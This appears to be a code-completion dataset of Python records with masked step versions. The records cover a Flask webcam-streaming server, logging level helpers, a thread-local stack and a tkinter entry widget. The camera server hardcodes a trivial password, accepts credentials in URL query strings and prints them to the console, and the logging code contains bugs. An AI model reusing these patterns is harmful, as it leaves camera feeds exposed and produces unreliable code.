1\ntime.sleep(1)\nprint('Ilość kamer: ' + str(len(Cameras)))\nimport threading\nfrom flask import render_template, Response\nfrom flask import Flask, jsonify\nfrom flask import abort\nfrom flask import request\nLogin = 'kamil'\nPassword = '123'\ntasks = [{'id': 1, 'title': u'Buy groceries', 'description':\n u'Milk, Cheese, Pizza, Fruit, Tylenol', 'done': False}, {'id': 2,\n 'title': u'Learn Python', 'description':\n u'Need to find a good Python tutorial on the web', 'done': False}]\nrestAppi = 
Flask(__name__)\n\n\ndef gen(task_id):\n while True:\n print('Thread runned ' + str(task_id))\n img = Cameras[task_id].getImg()\n ret, jpeg = cv2.imencode('.jpg', img)\n frame = jpeg.tobytes()\n yield b'--frame\\r\\nContent-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n'\n\n\n@restAppi.route('/video_feed/<int:task_id>')\ndef video_feed(task_id):\n return Response(gen(task_id), mimetype=\n 'multipart/x-mixed-replace; boundary=frame')\n\n\n@restAppi.route('/camerasPreview', methods=['GET'])\ndef camerasPreview():\n login = category = request.args.get('login')\n password = content_id = request.args.get('password')\n print(login)\n print(password)\n if login == Login and password == Password:\n return render_template('CamerasPreview.html', name='Kamil',\n camerasCount=len(Cameras))\n else:\n abort(401)\n\n\n@restAppi.route('/')\ndef index():\n return render_template('index.html')\n\n\n@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n\n@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': task[0]})\n\n\nrestAppiRunned = False\nif __name__ == '__main__':\n threading.Thread(target=restAppi.run(debug=False)).start()\n", "step-5": "import shutil\n\ntotal, used, free = shutil.disk_usage(\"/\")\n\nprint(\"Total: %d MiB\" % (total // (2**20)))\nprint(\"Used: %d MiB\" % (used // (2**20)))\nprint(\"Free: %d MiB\" % (free // (2**20)))\n\n\n\nfrom Camera import Camera\nimport time\nimport cv2\n\ndevices = Camera.getDevicesList()\nprint(devices)\n\ni=0\nCameras = []\nfor device in devices:\n Cameras.append(Camera(i))\n i=i+1\ntime.sleep(1)\n\nprint(\"Ilość kamer: \" + str(len(Cameras)))\n\nimport threading\n\n### REST\nfrom flask import render_template, Response\nfrom flask import Flask, jsonify\nfrom flask import abort\nfrom flask import 
request\n\nLogin = \"kamil\"\nPassword = \"123\"\n\ntasks = [\n {\n 'id': 1,\n 'title': u'Buy groceries',\n 'description': u'Milk, Cheese, Pizza, Fruit, Tylenol',\n 'done': False\n },\n {\n 'id': 2,\n 'title': u'Learn Python',\n 'description': u'Need to find a good Python tutorial on the web',\n 'done': False\n }\n]\n\nrestAppi = Flask(__name__)\ndef gen(task_id):\n while True:\n print(\"Thread runned \" + str(task_id))\n #get camera frame\n img = Cameras[task_id].getImg()\n ret, jpeg = cv2.imencode('.jpg', img)\n frame = jpeg.tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n')\n\n@restAppi.route('/video_feed/<int:task_id>')\ndef video_feed(task_id):\n #print(task_id)\n return Response(gen(task_id),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n@restAppi.route('/camerasPreview', methods=['GET'])\ndef camerasPreview():\n login = category = request.args.get('login')\n password = content_id = request.args.get('password')\n print(login)\n print(password)\n if (login == Login) and password == Password:\n return render_template(\"CamerasPreview.html\", name = \"Kamil\", camerasCount = len(Cameras))\n else: abort(401);\n\n@restAppi.route('/')\ndef index():\n return render_template(\"index.html\")\n\n@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': task[0]})\n\nrestAppiRunned = False\nif __name__ == \"__main__\":\n threading.Thread(target=restAppi.run(debug=False)).start()\n\n#if __name__ == '__main__':\n # restAppi.run(debug=False)\n\n", "step-ids": [ 6, 7, 8, 9, 10 ] }
[ 6, 7, 8, 9, 10 ]
# -*- coding: utf-8 -*- from __future__ import print_function, absolute_import, unicode_literals, division __all__ = ['getLevelName', 'getLevel'] #, 'getLevelOrName', '_checkLevel'] import logging # private re-implementations till Python Core fixes Lib/logging # XXX bug numbers here def getLevelName(level, format='%s', no_match=None): # strict={'case': False, 'type': False, 'map': False}, # fixup=False """Return the textual representation of 'level'. Whether predefined (eg. CRITICAL -> "CRITICAL") or user-defined via addLevelName(), the string associated with 'level' is chosen. Otherwise, 'level' (no_match == NONE) or 'no_match' is returned subject to formatting per 'format'. In the spirit of "be liberal in what you accept", any value of 'level' that survives int() will be accepted (FUTURE: subject to 'strict'). Issue #29220 introduced the BAD IDEA that passing an empty string (an obvious TypeError) would return same. This was requested in order to squash the fall-thru behavior of returning "Level %s", when the multi-word response was itself the actual ERROR since it broke all field-based log processing! The astute reader will note that an empty string causes the same pathology... DEPRECATION WARNING: This function WRONGLY returned the mapped Integer if a String form was provided. This violates the clearly stated purpose and forces the caller into defensive Type checks or suffer future TypeErrors. NOTE: Does no bounds or validity checks. Use _checkLevel(). FUTURE: In strict mode, enforce parameter dataType, case, or membership. 
""" try: # check Name->Level in case called incorrectly (backward compat) if level in logging._nameToLevel: return format % level # retval = _checkLevel(level, flags, fix=T/F) # if isinstance(retval, bool) then handle pass/fail, else update level with fixed value result = logging._levelToName.get(int(level)) if result is not None: return format % result except TypeError: if raiseExceptions: raise("parameter 'level' must reduce to an Integer") except ValueError: pass return format % level if no_match is None else format % no_match def getLevel(levelName, no_match=logging.NOTSET): # strict={'case': False, 'type': False, 'map': False}, # fixup=False """Return the numeric representation of levelName. see getLevelName() for background """ try: result = logging._nameToLevel.get(levelName) if result is not None: return result return int(levelName) except ValueError: if raiseExceptions: raise("parameter 'levelName' must be a defined String") return no_match def getLevelOrName(level): pass def _checkLevel(level, case=False, type=False, map=False): #TODO define check as dictionary pass # """Check parameter against defined values # # Returns corresponding or original Integer, or NOTSET if no-match. # Will raise TypeError or ValueError as applicable. # # NOTE: Since all logging.$level() functions choose to emit based on # numeric comparison, a default of ERROR would be more logical. # """ try: if isinstance(level, str): if not case: level = str.upper(level) rv = _nameToLevel.get(level) # if rv is None: # XXX what now? 
if isinstance(level, int) or not type: # flip negative values level = int(level) if level in _levelToName(level): rv = level else: # tolerate any Integer value rv = NOTSET if map else level if rv is None: level = str(level) if rv is None: if level in _levelToName or (not type and int(level) in _levelToName): rv = NOTSET if level < NOTSET else level # rv = level if rv is None and map: raise ValueError else: # return parameter even though invalid rv = level # sor level < NOTSET or level > ???: # #raise ValueError # if isinstance(level, int): # XXX check >NOTSET # else: # raise TypeError #FIXME - test harness injects '+1', so tolerating # arbitrary integers is expected behavior. Why? # raise ValueError rv = int(level) except (TypeError, ValueError, KeyError) as err: if raiseExceptions: # test harness (../test/test_logging) expects 'TypeError' ONLY raise TypeError("Level not an integer or a valid string: %r" % level) from err except Exception: pass return NOTSET - 1 if rv is None else rv
normal
{ "blob_id": "ba8b46f830abaaaedf1730cba2f04fd677f11da4", "index": 182, "step-1": "<mask token>\n\n\ndef getLevel(levelName, no_match=logging.NOTSET):\n \"\"\"Return the numeric representation of levelName.\n\n see getLevelName() for background\n \"\"\"\n try:\n result = logging._nameToLevel.get(levelName)\n if result is not None:\n return result\n return int(levelName)\n except ValueError:\n if raiseExceptions:\n raise \"parameter 'levelName' must be a defined String\"\n return no_match\n\n\ndef getLevelOrName(level):\n pass\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef getLevel(levelName, no_match=logging.NOTSET):\n \"\"\"Return the numeric representation of levelName.\n\n see getLevelName() for background\n \"\"\"\n try:\n result = logging._nameToLevel.get(levelName)\n if result is not None:\n return result\n return int(levelName)\n except ValueError:\n if raiseExceptions:\n raise \"parameter 'levelName' must be a defined String\"\n return no_match\n\n\ndef getLevelOrName(level):\n pass\n\n\ndef _checkLevel(level, case=False, type=False, map=False):\n pass\n try:\n if isinstance(level, str):\n if not case:\n level = str.upper(level)\n rv = _nameToLevel.get(level)\n if isinstance(level, int) or not type:\n level = int(level)\n if level in _levelToName(level):\n rv = level\n else:\n rv = NOTSET if map else level\n if rv is None:\n level = str(level)\n if rv is None:\n if level in _levelToName or not type and int(level\n ) in _levelToName:\n rv = NOTSET if level < NOTSET else level\n if rv is None and map:\n raise ValueError\n else:\n rv = level\n rv = int(level)\n except (TypeError, ValueError, KeyError) as err:\n if raiseExceptions:\n raise TypeError('Level not an integer or a valid string: %r' %\n level) from err\n except Exception:\n pass\n return NOTSET - 1 if rv is None else rv\n", "step-3": "<mask token>\n__all__ = ['getLevelName', 'getLevel']\n<mask token>\n\n\ndef getLevelName(level, format='%s', no_match=None):\n \"\"\"Return the textual 
representation of 'level'.\n\n Whether predefined (eg. CRITICAL -> \"CRITICAL\") or user-defined via\n addLevelName(), the string associated with 'level' is chosen.\n Otherwise, 'level' (no_match == NONE) or 'no_match' is returned\n subject to formatting per 'format'.\n\n In the spirit of \"be liberal in what you accept\", any value of 'level'\n that survives int() will be accepted (FUTURE: subject to 'strict').\n\n Issue #29220 introduced the BAD IDEA that passing an empty string\n (an obvious TypeError) would return same. This was requested in order\n to squash the fall-thru behavior of returning \"Level %s\", when the\n multi-word response was itself the actual ERROR since it broke all\n field-based log processing! The astute reader will note that an empty\n string causes the same pathology...\n\n DEPRECATION WARNING:\n This function WRONGLY returned the mapped Integer if a String form\n was provided. This violates the clearly stated purpose and forces\n the caller into defensive Type checks or suffer future TypeErrors.\n\n NOTE:\n Does no bounds or validity checks. 
Use _checkLevel().\n\n FUTURE:\n In strict mode, enforce parameter dataType, case, or membership.\n \"\"\"\n try:\n if level in logging._nameToLevel:\n return format % level\n result = logging._levelToName.get(int(level))\n if result is not None:\n return format % result\n except TypeError:\n if raiseExceptions:\n raise \"parameter 'level' must reduce to an Integer\"\n except ValueError:\n pass\n return format % level if no_match is None else format % no_match\n\n\ndef getLevel(levelName, no_match=logging.NOTSET):\n \"\"\"Return the numeric representation of levelName.\n\n see getLevelName() for background\n \"\"\"\n try:\n result = logging._nameToLevel.get(levelName)\n if result is not None:\n return result\n return int(levelName)\n except ValueError:\n if raiseExceptions:\n raise \"parameter 'levelName' must be a defined String\"\n return no_match\n\n\ndef getLevelOrName(level):\n pass\n\n\ndef _checkLevel(level, case=False, type=False, map=False):\n pass\n try:\n if isinstance(level, str):\n if not case:\n level = str.upper(level)\n rv = _nameToLevel.get(level)\n if isinstance(level, int) or not type:\n level = int(level)\n if level in _levelToName(level):\n rv = level\n else:\n rv = NOTSET if map else level\n if rv is None:\n level = str(level)\n if rv is None:\n if level in _levelToName or not type and int(level\n ) in _levelToName:\n rv = NOTSET if level < NOTSET else level\n if rv is None and map:\n raise ValueError\n else:\n rv = level\n rv = int(level)\n except (TypeError, ValueError, KeyError) as err:\n if raiseExceptions:\n raise TypeError('Level not an integer or a valid string: %r' %\n level) from err\n except Exception:\n pass\n return NOTSET - 1 if rv is None else rv\n", "step-4": "from __future__ import print_function, absolute_import, unicode_literals, division\n__all__ = ['getLevelName', 'getLevel']\nimport logging\n\n\ndef getLevelName(level, format='%s', no_match=None):\n \"\"\"Return the textual representation of 'level'.\n\n Whether predefined 
(eg. CRITICAL -> \"CRITICAL\") or user-defined via\n addLevelName(), the string associated with 'level' is chosen.\n Otherwise, 'level' (no_match == NONE) or 'no_match' is returned\n subject to formatting per 'format'.\n\n In the spirit of \"be liberal in what you accept\", any value of 'level'\n that survives int() will be accepted (FUTURE: subject to 'strict').\n\n Issue #29220 introduced the BAD IDEA that passing an empty string\n (an obvious TypeError) would return same. This was requested in order\n to squash the fall-thru behavior of returning \"Level %s\", when the\n multi-word response was itself the actual ERROR since it broke all\n field-based log processing! The astute reader will note that an empty\n string causes the same pathology...\n\n DEPRECATION WARNING:\n This function WRONGLY returned the mapped Integer if a String form\n was provided. This violates the clearly stated purpose and forces\n the caller into defensive Type checks or suffer future TypeErrors.\n\n NOTE:\n Does no bounds or validity checks. 
Use _checkLevel().\n\n FUTURE:\n In strict mode, enforce parameter dataType, case, or membership.\n \"\"\"\n try:\n if level in logging._nameToLevel:\n return format % level\n result = logging._levelToName.get(int(level))\n if result is not None:\n return format % result\n except TypeError:\n if raiseExceptions:\n raise \"parameter 'level' must reduce to an Integer\"\n except ValueError:\n pass\n return format % level if no_match is None else format % no_match\n\n\ndef getLevel(levelName, no_match=logging.NOTSET):\n \"\"\"Return the numeric representation of levelName.\n\n see getLevelName() for background\n \"\"\"\n try:\n result = logging._nameToLevel.get(levelName)\n if result is not None:\n return result\n return int(levelName)\n except ValueError:\n if raiseExceptions:\n raise \"parameter 'levelName' must be a defined String\"\n return no_match\n\n\ndef getLevelOrName(level):\n pass\n\n\ndef _checkLevel(level, case=False, type=False, map=False):\n pass\n try:\n if isinstance(level, str):\n if not case:\n level = str.upper(level)\n rv = _nameToLevel.get(level)\n if isinstance(level, int) or not type:\n level = int(level)\n if level in _levelToName(level):\n rv = level\n else:\n rv = NOTSET if map else level\n if rv is None:\n level = str(level)\n if rv is None:\n if level in _levelToName or not type and int(level\n ) in _levelToName:\n rv = NOTSET if level < NOTSET else level\n if rv is None and map:\n raise ValueError\n else:\n rv = level\n rv = int(level)\n except (TypeError, ValueError, KeyError) as err:\n if raiseExceptions:\n raise TypeError('Level not an integer or a valid string: %r' %\n level) from err\n except Exception:\n pass\n return NOTSET - 1 if rv is None else rv\n", "step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import, unicode_literals, division\n\n__all__ = ['getLevelName', 'getLevel'] #, 'getLevelOrName', '_checkLevel']\n\nimport logging\n\n# private re-implementations till Python Core fixes Lib/logging\n# 
XXX bug numbers here\n\ndef getLevelName(level, format='%s', no_match=None):\n# strict={'case': False, 'type': False, 'map': False},\n# fixup=False\n \"\"\"Return the textual representation of 'level'.\n\n Whether predefined (eg. CRITICAL -> \"CRITICAL\") or user-defined via\n addLevelName(), the string associated with 'level' is chosen.\n Otherwise, 'level' (no_match == NONE) or 'no_match' is returned\n subject to formatting per 'format'.\n\n In the spirit of \"be liberal in what you accept\", any value of 'level'\n that survives int() will be accepted (FUTURE: subject to 'strict').\n\n Issue #29220 introduced the BAD IDEA that passing an empty string\n (an obvious TypeError) would return same. This was requested in order\n to squash the fall-thru behavior of returning \"Level %s\", when the\n multi-word response was itself the actual ERROR since it broke all\n field-based log processing! The astute reader will note that an empty\n string causes the same pathology...\n\n DEPRECATION WARNING:\n This function WRONGLY returned the mapped Integer if a String form\n was provided. This violates the clearly stated purpose and forces\n the caller into defensive Type checks or suffer future TypeErrors.\n\n NOTE:\n Does no bounds or validity checks. 
Use _checkLevel().\n\n FUTURE:\n In strict mode, enforce parameter dataType, case, or membership.\n \"\"\"\n\n try:\n # check Name->Level in case called incorrectly (backward compat)\n if level in logging._nameToLevel:\n return format % level\n\n # retval = _checkLevel(level, flags, fix=T/F)\n # if isinstance(retval, bool) then handle pass/fail, else update level with fixed value\n\n result = logging._levelToName.get(int(level))\n if result is not None:\n return format % result\n\n except TypeError:\n if raiseExceptions:\n raise(\"parameter 'level' must reduce to an Integer\")\n except ValueError:\n pass\n\n return format % level if no_match is None else format % no_match\n\n\ndef getLevel(levelName, no_match=logging.NOTSET):\n# strict={'case': False, 'type': False, 'map': False},\n# fixup=False\n \"\"\"Return the numeric representation of levelName.\n\n see getLevelName() for background\n \"\"\"\n try:\n result = logging._nameToLevel.get(levelName)\n if result is not None:\n return result\n\n return int(levelName)\n\n except ValueError:\n if raiseExceptions:\n raise(\"parameter 'levelName' must be a defined String\")\n\n return no_match\n\n\ndef getLevelOrName(level):\n pass\n\n\ndef _checkLevel(level, case=False, type=False, map=False):\n #TODO define check as dictionary\n pass\n # \"\"\"Check parameter against defined values\n #\n # Returns corresponding or original Integer, or NOTSET if no-match.\n # Will raise TypeError or ValueError as applicable.\n #\n # NOTE: Since all logging.$level() functions choose to emit based on\n # numeric comparison, a default of ERROR would be more logical.\n # \"\"\"\n try:\n if isinstance(level, str):\n if not case:\n level = str.upper(level)\n rv = _nameToLevel.get(level)\n # if rv is None:\n # XXX what now?\n if isinstance(level, int) or not type:\n # flip negative values\n level = int(level)\n if level in _levelToName(level):\n rv = level\n else:\n # tolerate any Integer value\n rv = NOTSET if map else level\n if rv is 
None:\n level = str(level)\n if rv is None:\n if level in _levelToName or (not type and int(level) in _levelToName):\n rv = NOTSET if level < NOTSET else level\n # rv = level\n if rv is None and map:\n raise ValueError\n else:\n # return parameter even though invalid\n rv = level\n # sor level < NOTSET or level > ???:\n # #raise ValueError\n # if isinstance(level, int):\n # XXX check >NOTSET\n # else:\n # raise TypeError\n #FIXME - test harness injects '+1', so tolerating\n # arbitrary integers is expected behavior. Why?\n # raise ValueError\n rv = int(level)\n except (TypeError, ValueError, KeyError) as err:\n if raiseExceptions:\n # test harness (../test/test_logging) expects 'TypeError' ONLY\n raise TypeError(\"Level not an integer or a valid string: %r\" % level) from err\n except Exception:\n pass\n\n return NOTSET - 1 if rv is None else rv\n", "step-ids": [ 2, 3, 5, 6, 7 ] }
[ 2, 3, 5, 6, 7 ]
# -*- coding: utf-8 -*- try: from greenlet import getcurrent as get_current_greenlet except ImportError: get_current_greenlet = int from thread import get_ident as get_current_thread from threading import Lock if get_current_greenlet is int: # Use thread get_ident = get_current_thread else: # Use greenlet get_ident = lambda: (get_current_thread(), get_current_greenlet()) class Local(object): __slots__ = ('__data__', '__lock__') def __init__(self): object.__setattr__(self, '__data__', {}) object.__setattr__(self, '__lock__', Lock()) def __iter__(self): return self.__data__.iteritems() def __getattr__(self, item): self.__lock__.acquire() try: try: return self.__data__[get_ident()][item] except KeyError: raise AttributeError(item) finally: self.__lock__.release() def __setattr__(self, key, value): self.__lock__.acquire() try: _id = get_ident() data = self.__data__ if _id in data: data[_id][key] = value else: data[_id] = {key: value} finally: self.__lock__.release() def __delattr__(self, item): self.__lock__.acquire() try: try: del self.__data__[get_ident()][item] except KeyError: raise AttributeError(item) finally: self.__lock__.release() def __release__(self): self.__data__.pop(get_ident(), None) class LocalStack(object): def __init__(self): self._local = Local() self._lock = Lock() def push(self, obj): self._lock.acquire() try: rv = getattr(self._local, 'stack', None) if rv is None: self._local.stack = rv = [] rv.append(obj) return rv finally: self._lock.release() def pop(self): self._lock.acquire() try: stack = getattr(self._local, 'stack', None) if stack is None: return None elif len(stack) == 1: self._local.__release__() return stack[-1] else: stack.pop() finally: self._lock.release() @property def top(self): try: return self._local.stack[-1] except (AttributeError, IndexError): return None
normal
{ "blob_id": "f55b286448f114f3823f099a576af7bec1780a8c", "index": 461, "step-1": "<mask token>\n\n\nclass Local(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __delattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n del self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __release__(self):\n self.__data__.pop(get_ident(), None)\n\n\nclass LocalStack(object):\n\n def __init__(self):\n self._local = Local()\n self._lock = Lock()\n\n def push(self, obj):\n self._lock.acquire()\n try:\n rv = getattr(self._local, 'stack', None)\n if rv is None:\n self._local.stack = rv = []\n rv.append(obj)\n return rv\n finally:\n self._lock.release()\n\n def pop(self):\n self._lock.acquire()\n try:\n stack = getattr(self._local, 'stack', None)\n if stack is None:\n return None\n elif len(stack) == 1:\n self._local.__release__()\n return stack[-1]\n else:\n stack.pop()\n finally:\n self._lock.release()\n\n @property\n def top(self):\n try:\n return self._local.stack[-1]\n except (AttributeError, IndexError):\n return None\n", "step-2": "<mask token>\n\n\nclass Local(object):\n <mask token>\n <mask token>\n\n def __iter__(self):\n return self.__data__.iteritems()\n\n def __getattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n return self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __setattr__(self, key, value):\n self.__lock__.acquire()\n try:\n _id = get_ident()\n data = self.__data__\n if _id in data:\n data[_id][key] = value\n else:\n data[_id] = {key: value}\n finally:\n self.__lock__.release()\n\n def __delattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n del self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __release__(self):\n self.__data__.pop(get_ident(), None)\n\n\nclass 
LocalStack(object):\n\n def __init__(self):\n self._local = Local()\n self._lock = Lock()\n\n def push(self, obj):\n self._lock.acquire()\n try:\n rv = getattr(self._local, 'stack', None)\n if rv is None:\n self._local.stack = rv = []\n rv.append(obj)\n return rv\n finally:\n self._lock.release()\n\n def pop(self):\n self._lock.acquire()\n try:\n stack = getattr(self._local, 'stack', None)\n if stack is None:\n return None\n elif len(stack) == 1:\n self._local.__release__()\n return stack[-1]\n else:\n stack.pop()\n finally:\n self._lock.release()\n\n @property\n def top(self):\n try:\n return self._local.stack[-1]\n except (AttributeError, IndexError):\n return None\n", "step-3": "<mask token>\n\n\nclass Local(object):\n <mask token>\n\n def __init__(self):\n object.__setattr__(self, '__data__', {})\n object.__setattr__(self, '__lock__', Lock())\n\n def __iter__(self):\n return self.__data__.iteritems()\n\n def __getattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n return self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __setattr__(self, key, value):\n self.__lock__.acquire()\n try:\n _id = get_ident()\n data = self.__data__\n if _id in data:\n data[_id][key] = value\n else:\n data[_id] = {key: value}\n finally:\n self.__lock__.release()\n\n def __delattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n del self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __release__(self):\n self.__data__.pop(get_ident(), None)\n\n\nclass LocalStack(object):\n\n def __init__(self):\n self._local = Local()\n self._lock = Lock()\n\n def push(self, obj):\n self._lock.acquire()\n try:\n rv = getattr(self._local, 'stack', None)\n if rv is None:\n self._local.stack = rv = []\n rv.append(obj)\n return rv\n finally:\n self._lock.release()\n\n def pop(self):\n self._lock.acquire()\n try:\n stack = getattr(self._local, 
'stack', None)\n if stack is None:\n return None\n elif len(stack) == 1:\n self._local.__release__()\n return stack[-1]\n else:\n stack.pop()\n finally:\n self._lock.release()\n\n @property\n def top(self):\n try:\n return self._local.stack[-1]\n except (AttributeError, IndexError):\n return None\n", "step-4": "try:\n from greenlet import getcurrent as get_current_greenlet\nexcept ImportError:\n get_current_greenlet = int\nfrom thread import get_ident as get_current_thread\nfrom threading import Lock\nif get_current_greenlet is int:\n get_ident = get_current_thread\nelse:\n get_ident = lambda : (get_current_thread(), get_current_greenlet())\n\n\nclass Local(object):\n __slots__ = '__data__', '__lock__'\n\n def __init__(self):\n object.__setattr__(self, '__data__', {})\n object.__setattr__(self, '__lock__', Lock())\n\n def __iter__(self):\n return self.__data__.iteritems()\n\n def __getattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n return self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __setattr__(self, key, value):\n self.__lock__.acquire()\n try:\n _id = get_ident()\n data = self.__data__\n if _id in data:\n data[_id][key] = value\n else:\n data[_id] = {key: value}\n finally:\n self.__lock__.release()\n\n def __delattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n del self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __release__(self):\n self.__data__.pop(get_ident(), None)\n\n\nclass LocalStack(object):\n\n def __init__(self):\n self._local = Local()\n self._lock = Lock()\n\n def push(self, obj):\n self._lock.acquire()\n try:\n rv = getattr(self._local, 'stack', None)\n if rv is None:\n self._local.stack = rv = []\n rv.append(obj)\n return rv\n finally:\n self._lock.release()\n\n def pop(self):\n self._lock.acquire()\n try:\n stack = getattr(self._local, 'stack', None)\n if stack is 
None:\n return None\n elif len(stack) == 1:\n self._local.__release__()\n return stack[-1]\n else:\n stack.pop()\n finally:\n self._lock.release()\n\n @property\n def top(self):\n try:\n return self._local.stack[-1]\n except (AttributeError, IndexError):\n return None\n", "step-5": "# -*- coding: utf-8 -*-\ntry:\n from greenlet import getcurrent as get_current_greenlet\nexcept ImportError:\n get_current_greenlet = int\n\nfrom thread import get_ident as get_current_thread\nfrom threading import Lock\n\n\nif get_current_greenlet is int: # Use thread\n get_ident = get_current_thread\nelse: # Use greenlet\n get_ident = lambda: (get_current_thread(), get_current_greenlet())\n\n\nclass Local(object):\n __slots__ = ('__data__', '__lock__')\n\n def __init__(self):\n object.__setattr__(self, '__data__', {})\n object.__setattr__(self, '__lock__', Lock())\n\n def __iter__(self):\n return self.__data__.iteritems()\n\n def __getattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n return self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __setattr__(self, key, value):\n self.__lock__.acquire()\n try:\n _id = get_ident()\n data = self.__data__\n if _id in data:\n data[_id][key] = value\n else:\n data[_id] = {key: value}\n finally:\n self.__lock__.release()\n\n def __delattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n del self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __release__(self):\n self.__data__.pop(get_ident(), None)\n\n\nclass LocalStack(object):\n\n def __init__(self):\n self._local = Local()\n self._lock = Lock()\n\n def push(self, obj):\n self._lock.acquire()\n try:\n rv = getattr(self._local, 'stack', None)\n if rv is None:\n self._local.stack = rv = []\n rv.append(obj)\n return rv\n finally:\n self._lock.release()\n\n def pop(self):\n self._lock.acquire()\n try:\n stack = getattr(self._local, 
'stack', None)\n if stack is None:\n return None\n elif len(stack) == 1:\n self._local.__release__()\n return stack[-1]\n else:\n stack.pop()\n finally:\n self._lock.release()\n\n @property\n def top(self):\n try:\n return self._local.stack[-1]\n except (AttributeError, IndexError):\n return None\n", "step-ids": [ 8, 11, 12, 15, 16 ] }
[ 8, 11, 12, 15, 16 ]
# -*- coding: utf-8 -*- """Labeled entry widget. The goal of these widgets is twofold: to make it easier for developers to implement dialogs with compound widgets, and to naturally standardize the user interface presented to the user. """ import logging import seamm_widgets as sw import tkinter as tk import tkinter.ttk as ttk logger = logging.getLogger(__name__) options = { "entry": { "class_": "class_", "cursor": "cursor", "exportselection": "exportselection", "font": "font", "invalidcommand": "invalidcommand", "justify": "justify", "show": "show", "style": "style", "takefocus": "takefocus", "variable": "textvariable", "validate": "validate", "validatecommand": "validatecommand", "width": "width", "xscrollcommand": "xscrollcommand", }, } class LabeledEntry(sw.LabeledWidget): def __init__(self, parent, *args, **kwargs): """Initialize the instance""" class_ = kwargs.pop("class_", "MLabeledEntry") super().__init__(parent, class_=class_) interior = self.interior # entry justify = kwargs.pop("justify", tk.LEFT) entrywidth = kwargs.pop("width", 15) self.entry = ttk.Entry(interior, justify=justify, width=entrywidth) self.entry.grid(row=0, column=0, sticky=tk.EW) # interior frame self.interior = ttk.Frame(interior) self.interior.grid(row=0, column=1, sticky=tk.NSEW) interior.columnconfigure(0, weight=1) self.config(**kwargs) @property def value(self): return self.get() @value.setter def value(self, value): self.set(value) def show(self, *args): """Show only the specified subwidgets. 
'all' or no arguments reverts to showing all""" super().show(*args) show_all = len(args) == 0 or args[0] == "all" if show_all or "entry" in args: self.entry.grid(row=0, column=0, sticky=tk.EW) else: self.entry.grid_forget() def set(self, value): """Set the value of the entry widget""" self.entry.delete(0, tk.END) if value is None: return self.entry.insert(0, value) def get(self): """return the current value""" value = self.entry.get() return value def config(self, **kwargs): """Set the configuration of the megawidget""" # our options that we deal with entry = options["entry"] # cannot modify kwargs while iterating over it... keys = [*kwargs.keys()] for k in keys: if k in entry: v = kwargs.pop(k) self.entry.config(**{entry[k]: v}) # having removed our options, pass rest to parent super().config(**kwargs)
normal
{ "blob_id": "111186f1d45b9cf3bf9065c7fa83a8f3f796bbe1", "index": 5841, "step-1": "<mask token>\n\n\nclass LabeledEntry(sw.LabeledWidget):\n <mask token>\n\n @property\n def value(self):\n return self.get()\n <mask token>\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n super().show(*args)\n show_all = len(args) == 0 or args[0] == 'all'\n if show_all or 'entry' in args:\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n else:\n self.entry.grid_forget()\n <mask token>\n\n def get(self):\n \"\"\"return the current value\"\"\"\n value = self.entry.get()\n return value\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n entry = options['entry']\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n super().config(**kwargs)\n", "step-2": "<mask token>\n\n\nclass LabeledEntry(sw.LabeledWidget):\n <mask token>\n\n @property\n def value(self):\n return self.get()\n <mask token>\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n super().show(*args)\n show_all = len(args) == 0 or args[0] == 'all'\n if show_all or 'entry' in args:\n self.entry.grid(row=0, column=0, sticky=tk.EW)\n else:\n self.entry.grid_forget()\n\n def set(self, value):\n \"\"\"Set the value of the entry widget\"\"\"\n self.entry.delete(0, tk.END)\n if value is None:\n return\n self.entry.insert(0, value)\n\n def get(self):\n \"\"\"return the current value\"\"\"\n value = self.entry.get()\n return value\n\n def config(self, **kwargs):\n 